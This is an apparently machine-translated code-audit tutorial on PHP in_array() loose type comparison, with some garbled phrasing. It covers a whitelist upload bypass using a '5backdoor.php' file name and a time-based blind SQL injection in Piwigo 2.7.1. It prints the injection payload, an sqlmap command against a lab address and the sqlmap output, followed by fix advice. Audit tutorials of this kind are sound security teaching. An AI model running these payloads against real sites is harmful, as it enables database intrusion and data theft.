Code Audit Learning 01-in_array () function defect

First, start the Code audit tour 01

From today on, Learning Code audit, this article is called Code Audit 01, the topic from the PHP security CALENDAR 2017, the first question, combined with the safe writing of the Red Sun, start.

Second, first look at this topic 1, title name: Wish List

2. Function of In_array ()

The action of the In_array () function is to determine whether the first parameter exists in the second argument, that there is a return of true, that there is no return false. It is important to note that if the third argument of the function is true, the first argument must also be the same type as the second parameter before the function can return true. Do not write the third parameter, in some cases the function will be cast, the problem of the issue is here.

3, the problem of the analysis of loopholes

if (in_array($this->file[‘name‘], $this->whitelist)) {    move_uploaded_file($this->file[‘tmp_name‘], self::UPLOAD_DIRECTORY . $this->file[‘name‘]);}

The In_array () function simply determines if the file name exists in the whitelist, and does not set the third argument to true, the attacker can upload a file with the 5backdoor.php file name 5backdoor , and the In_array () function casts the file name to a 5 Ranger (1,24) white list conditions 5backdoor.php can be uploaded, so an arbitrary file upload vulnerability arises.

4, In_array () Expansion of knowledge

In_array a piece of code, you can clearly see the difference between the non-strict mode and strict mode:

<?php$array = array(    ‘egg‘ => true,    ‘cheese‘ => false,    ‘hair‘ => 765,    ‘goblins‘ => null,    ‘ogres‘ => ‘no ogres allowed in this array‘);// Loose checking -- return values are in comments// First three make sense, last four do notvar_dump(in_array(null, $array)); // truevar_dump(in_array(false, $array)); // truevar_dump(in_array(765, $array)); // truevar_dump(in_array(763, $array)); // truevar_dump(in_array(‘egg‘, $array)); // truevar_dump(in_array(‘hhh‘, $array)); // truevar_dump(in_array(array(), $array)); // true// Strict checkingvar_dump(in_array(null, $array, true)); // truevar_dump(in_array(false, $array, true)); // truevar_dump(in_array(765, $array, true)); // truevar_dump(in_array(763, $array, true)); // falsevar_dump(in_array(‘egg‘, $array, true)); // falsevar_dump(in_array(‘hhh‘, $array, true)); // falsevar_dump(in_array(array(), $array, true)); // false?>

Iii. combining a case

Select piwigo2.7.1 a SQL injection vulnerability for the content management system to analyze

1, the Flaw principle analysis

The vulnerability involves files: include/functions_rate.inc.php , include/config_default.inc.php as well as the root directory picture.php .

picture.phpKey code:

if (isset($_GET[‘action‘])){  switch ($_GET[‘action‘])/*****************中间省略*********************/       case ‘rate‘ :    {      include_once(PHPWG_ROOT_PATH.‘include/functions_rate.inc.php‘);      rate_picture($page[‘image_id‘], $_POST[‘rate‘]);      redirect($url_self);    }/*****************中间省略*********************/    }      

include/functions_rate.inc.phpKey code

function rate_picture($image_id, $rate){  global $conf, $user;  if (!isset($rate)      or !$conf[‘rate‘]      or !in_array($rate, $conf[‘rate_items‘]))  {    return false;  }/*****************中间省略*********************/     if ($user_anonymous)  {    $query.= ‘ AND anonymous_id = \‘‘.$anonymous_id.‘\‘‘;  }  pwg_query($query);  $query = ‘INSERT  INTO ‘.RATE_TABLE.‘  (user_id,anonymous_id,element_id,rate,date)  VALUES  (‘    .$user[‘id‘].‘,‘    .‘\‘‘.$anonymous_id.‘\‘,‘    .$image_id.‘,‘    .$rate    .‘,NOW());‘;  pwg_query($query);  return update_rating_score($image_id);}    

include/config_default.inc.phpKey code

$conf[‘rate_items‘] = array(0,1,2,3,4,5);

Through the above code analysis, when the parameter action=rate will call include/functions_rate.inc.php the rate_picture($image_id, $rate) function, because the function in_array($rate, $conf[‘rate_items‘])) does not set the third parameter because true, the check is not strict, resulting in variable $rate variables controllable, will be $rate set to 1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));# that SQ The L statement will become:

INSERT INTO piwigo_rate (user_id,anonymous_id,element_id,rate,date) VALUES (2,‘192.168.2‘,1,1,1 and if(ascii(substr((select database()),1,1))=112,1,sleep(3)));#,NOW()) ;

The time-based SQL blinds are generated.

2. Proof of vulnerability

Use the SQL injection tool sqlmap to prove the vulnerability, payload as follows:

python2 sqlmap.py -u "http://192.168.203.131/piwigo/picture.php?/1/category/1&action=rate" --data "rate=1" --dbs --batch

Vulnerability validation returns results:

[20:45:34] [INFO] testing connection to the target Urlsqlmap got a 302 redirect to ' http://192.168.203.131:80/piwigo/pictu Re.php?/1/category/1 '. Want to follow? [y/n] Yredirect is a result of a POST request. Does want to resend original POST data to a new location? [y/n] Ysqlmap resumed the following injection point (s) from stored session:---parameter:rate (POST) type:and/or time-based Blind Title:mysql >= 5.0.12 and time-based blind payload:rate=1 and SLEEP (5)---[20:45:37] [INFO] the Back-end D BMS is Mysqlweb server operating system:windowsweb application technology:php 5.4.45, Apache 2.4.23back-end dbms:mysql >= 5.0.12[20:45:37] [info] fetching database names[20:45:37] [INFO] fetching number of databases[20:45:37] [info] resum ED:5[20:45:37] [INFO] resumed:information_schema[20:45:37] [info] resumed:mysq[20:45:37] [INFO] resumed:mysql[ 20:45:37] [INFO] resumed:performance_schema[20:45:37] [info] resumed:piwigo271available databases [5]:[*] InformatiOn_schema[*] mysq[*] mysql[*] performance_schema[*] piwigo271 

3. Repair Suggestions

Method 1: Set the third argument of the In_array () function to true;

Method 2: Use the Intval () function to convert the variable to a number;

Method 3: Use regular expression filtering, limited to numbers (the official modification is in this way).

Four, learn the same type of CTF topic five, Personal harvest six, reference articles

Code Audit Learning 01-in_array () function defect